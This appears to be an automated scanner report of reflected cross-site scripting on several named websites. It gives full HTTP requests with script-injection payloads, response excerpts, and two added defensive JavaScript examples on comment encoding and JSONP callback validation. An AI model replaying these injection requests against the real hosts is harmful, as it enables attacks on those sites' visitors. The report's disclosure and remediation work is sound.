var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 2441a<script>alert(1)</script>3c82a873a6e was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site2441a<script>alert(1)</script>3c82a873a6e&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:29 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n6), ms iad-agg-n6 ( sfo-agg-n45), ms sfo-agg-n45 ( origin)
ETag: "f4f38c4aee23a73f09d77826215df995-80952"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:29 GMT
Age: 0
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:29 GMT
Connection: keep-alive
Content-Length: 80952
The value of the js request parameter is copied into the HTML document as plain text between tags. The payload 56f76<script>alert(1)</script>f1eb6477288 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?js=56f76<script>alert(1)</script>f1eb6477288&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:25 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n40), ms sfo-agg-n40 ( origin)
ETag: "f9bfbcc84f8fc00f069b546540ef24b0-119"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:25 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:25 GMT
Connection: keep-alive
Content-Length: 119
The value of the js request parameter is copied into a JavaScript inline comment. The payload c4d58*/alert(1)//cadae76dd14 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:26 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n36), ms sfo-agg-n36 ( origin)
ETag: "921c1eecd508a1cdcf54fe736b0295a6-275310"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:26 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:26 GMT
Connection: keep-alive
Content-Length: 275310
/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister */ /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License
...[SNIP]...
1.105. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://common.onset.freedom.com
Path:
/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c442d<script>alert(1)</script>e464d1587a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c442d<script>alert(1)</script>e464d1587a7=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:51 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n44), ms sfo-agg-n44 ( origin)
ETag: "9619eb07dd52d1bb379fc8198f8514d7-86888"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:52 GMT
Age: 3
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:55 GMT
Connection: keep-alive
Content-Length: 86888
/* Reset styles for browser compatibility */ body, th, td, p, div { font-family:Arial, Helvetica, sans-serif; } html,ul,ol,li,h1,h2,h3,h4,h5,h6, pre ...[SNIP]...
1.106. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://common.onset.freedom.com
Path:
/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload e7e46*/alert(1)//5ca6254cbb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:45 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n25), ms iad-agg-n25 ( sfo-agg-n22), ms sfo-agg-n22 ( origin>CONN)
ETag: "36d7fe9bef85681434af3bae951e1aa9-277034"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:46 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:45 GMT
Connection: keep-alive
Content-Length: 277034
/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 */ /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License * * Date: 200 ...[SNIP]...
The value of the scode request parameter is copied into the HTML document as plain text between tags. The payload 3df07<script>alert(1)</script>35144f36647 was submitted in the scode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:37 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n14), ms sfo-agg-n14 ( origin)
ETag: "2ca22c76c464a94c8b23b21959b5333c-22441"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:37 GMT
Age: 0
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:37 GMT
Connection: keep-alive
Content-Length: 22441
/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 */ /*generic freedom site styles, take layout.css styles and define fonts, background images, etc */
/* define page areas */ body { font-family: Arial, Helvetica, sans-serif; font-size: 100%; ...[SNIP]...
The value of the scode request parameter is copied into a JavaScript inline comment. The payload 4af35*/alert(1)//4781d05c682 was submitted in the scode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:31 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n18), ms iad-agg-n18 ( sfo-agg-n52), ms sfo-agg-n52 ( origin)
ETag: "c2f050b674a3c750a989f83312ba3a06-4132"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:31 GMT
Connection: keep-alive
Content-Length: 4132
/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 */ /* * jQuery ifixpng plugin * (previously known as pngfix) * Version 2.1 (23/04/2008) * @requires jQuery v1.1.3 or above * * Examples at: http://jquery.khurshid.com * Copyright (c) 20 ...[SNIP]...
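Worked example for the comment-context reflections (the domain parameter in the analytics script earlier, and the js, scode and arbitrary-parameter-name cases of load.php): the leading /* request URL */ banner that load.php emits is rebuilt from the raw query string, beside a version that percent-encodes the query before placing it in the comment, with a check that the comment still ends where the banner intends. This is added illustration, not Freedom's load.php code; the bundle body is a stand-in and the way the banner is assembled is an assumption drawn from the responses.

```javascript
// Added example, not Freedom's load.php code. The responses above show the
// bundle prefixed with "/* <request URL> */"; the functions below assume that
// prefix is built from the raw query string, and the bundle body is a stand-in.

const LOADER_URL = 'http://common.cdn.onset.freedom.com/tools/load.php';
const BUNDLE = 'var bundleLoaded = 1;';      // stand-in for the real scripts

// Vulnerable: parameter names and values go into the comment as received,
// so the first "*/" in either of them ends the comment and the rest is code.
function loaderVulnerable(rawQuery) {
  return '/* ' + LOADER_URL + '?' + rawQuery + ' */\n' + BUNDLE;
}

// A block comment has no escape syntax, so the data itself must be unable to
// contain "*/". Percent-encoding everything outside the characters a query
// string needs does that ("*" becomes %2A, "/" becomes %2F) and keeps the
// banner readable, since the result is still a valid URL.
function sanitiseQueryForComment(rawQuery) {
  return String(rawQuery).replace(/[^A-Za-z0-9=&%._-]/gu, (c) => {
    const cp = c.codePointAt(0);
    return cp < 0x80
      ? '%' + cp.toString(16).toUpperCase().padStart(2, '0')
      : encodeURIComponent(c);             // UTF-8 percent-encoding
  });
}

function loaderHardened(rawQuery) {
  return '/* ' + LOADER_URL + '?' + sanitiseQueryForComment(rawQuery) +
         ' */\n' + BUNDLE;
}

// Check: the comment is intact only when the first "*/" in the output is the
// one the banner itself appends (the " */\n" right before the bundle).
function commentIntact(output) {
  const first = output.indexOf('*/');
  return first !== -1 && first === output.indexOf(' */\n') + 1;
}

// Query strings from the report: a value break-out via js=, a break-out via
// the *name* of an extra parameter (which value-only encoders never see),
// and a benign request for comparison.
const QUERIES = [
  'js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,' +
  'jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,' +
  'ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister',
  'js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,' +
  'jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav' +
  '&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1',
  'css=style,jquery.jcarousel,site&scode=ocregister',
];

function demoComments() {
  return QUERIES.map((q) => ({
    query: q,
    vulnerable: commentIntact(loaderVulnerable(q)),
    hardened: commentIntact(loaderHardened(q)),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(demoComments());
}
```

Two points worth keeping in mind when rating the load.php findings. A parameter name is reflected exactly like a value, so an encoder applied only to the values of known parameters would have left the e7e46*/alert(1)// case open. And these responses are served as text/css and text/javascript: a <script> reflection in such a body is inert when the file is pulled in through a <link> or <script src>, whereas a */ break-out in the JavaScript bundle executes in the origin of every page that includes it, which makes the comment-context cases the more serious ones here.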
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fc1bd<script>alert(1)</script>f099d0b47bf was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completedfc1bd<script>alert(1)</script>f099d0b47bf HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27
1.110. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://da.newstogram.com
Path:
/hg.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1a69a<script>alert(1)</script>840e96d1dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.compl/1a69a<script>alert(1)</script>840e96d1dd4eted HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27
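Worked example for the two hg.php callback reflections: a JSONP handler that writes the callback parameter in front of its JSON body, beside one that accepts only dotted JavaScript identifiers such as Newstogram.completed and refuses everything else. Added illustration, not Newstogram's code; the JSON body, the response headers and the callback length limit are assumptions, and the endpoint's real output format is not shown in the report.

```javascript
// Added example, not Newstogram's hg.php code. The sample data, the headers
// and the 64-character limit are constructed for illustration.

// Callback names that hg.php legitimately receives look like
// "Newstogram.completed": dotted JavaScript identifiers. Nothing else is
// needed, so nothing else is accepted.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const CALLBACK_MAX = 64;

// Vulnerable: whatever arrives in ?callback= is written in front of the JSON.
function jsonpVulnerable(callback, data) {
  return callback + '(' + JSON.stringify(data) + ');';
}

// Hardened: validate, do not encode. An invalid callback is refused (the
// caller answers 400 and never echoes the value). The "/**/" prefix is the
// conventional JSONP guard against the response being read as another
// format, and U+2028/U+2029 are escaped because JSON allows them raw while
// JavaScript string literals before ES2019 do not.
function jsonpHardened(callback, data) {
  if (typeof callback !== 'string' || callback.length > CALLBACK_MAX ||
      !CALLBACK_RE.test(callback)) {
    return null;
  }
  const json = JSON.stringify(data)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return '/**/' + callback + '(' + json + ');';
}

// Headers the hardened handler sends with the body: JSONP is script, and
// nosniff stops a browser from treating it as anything else.
const JSONP_HEADERS = {
  'Content-Type': 'application/javascript; charset=utf-8',
  'X-Content-Type-Options': 'nosniff',
};

// Constructed sample body; the uid value is the one from the request above.
const SAMPLE = { uid: 'B46354F1-787D-4611-AE0D-C5EFA6EF634B', q: 0, e: 2 };

function demoJsonp() {
  const good = 'Newstogram.completed';
  const bad = 'Newstogram.completedfc1bd<script>alert(1)</script>f099d0b47bf';
  return {
    goodHardened: jsonpHardened(good, SAMPLE),
    badVulnerable: jsonpVulnerable(bad, SAMPLE),
    badHardened: jsonpHardened(bad, SAMPLE),
    headers: JSONP_HEADERS,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demoJsonp());
}
```

Validation rather than encoding is the right shape here because the callback is supposed to be code: there is no encoding that keeps Newstogram.completed callable while making Newstogram.completed<script> harmless, so the only sound rule is an allow-list of what a callback may look like.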
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b337"><script>alert(1)</script>ef6b6cded06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/TR/DaffodilDays6b337"><script>alert(1)</script>ef6b6cded06/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b20"><script>alert(1)</script>f315c83fe6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<title>The American Cancer Society: </title> <meta http-equiv="Co ...[SNIP]... <form name="TrEventSearchForm" id="TrEventSearchForm" action="http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972" method="post"> ...[SNIP]...
1.113. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://daffodil.acsevents.org
Path: /site/TR/DaffodilDays/DDFY10Pennsylvania
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ab"><script>alert(1)</script>a53cb358e62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972&ab6ab"><script>alert(1)</script>a53cb358e62=1 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 59e02<script>alert(1)</script>41e145e4da2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/mapserver.superpages.com/p.json?callback=_ate.ad.hpr59e02<script>alert(1)</script>41e145e4da2&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fmapserver.superpages.com%2Fmapbasedsearch%2F%3F%26SRC%3Dcomlocal1a%26C%3Dbanks415ee%2522%253balert(1)%2F%2F7f39f412a8d%26L%3D19101%26CS%3DL%26MCBP%3Dtrue%26C%3DBanks%26STYPE%3DS%26PS%3D15%26search%3DFind%2BIt&ref=http%3A%2F%2Fburp%2Fshow%2F52&wzilxl HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 463
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 03 Feb 2011 18:54:36 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 05 Mar 2011 18:54:36 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296759276.60|1296659685.66; Domain=.addthis.com; Expires=Sat, 02-Feb-2013 14:10:54 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 03 Feb 2011 18:54:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 18:54:37 GMT
Connection: close
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6ebd"><script>alert(1)</script>7daaa4423aa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=f6ebd"><script>alert(1)</script>7daaa4423aa HTTP/1.1
Host: easycheckingbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.116. http://easycheckingbanking.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://easycheckingbanking.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2176b"><script>alert(1)</script>81ec6443090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking?adid=640302&2176b"><script>alert(1)</script>81ec6443090=1 HTTP/1.1
Host: easycheckingbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d90"><script>alert(1)</script>0368ae71355 was submitted in the REST URL parameter 5. This input was echoed as f5d90\"><script>alert(1)</script>0368ae71355 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90"><script>alert(1)</script>0368ae71355/ HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:05:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
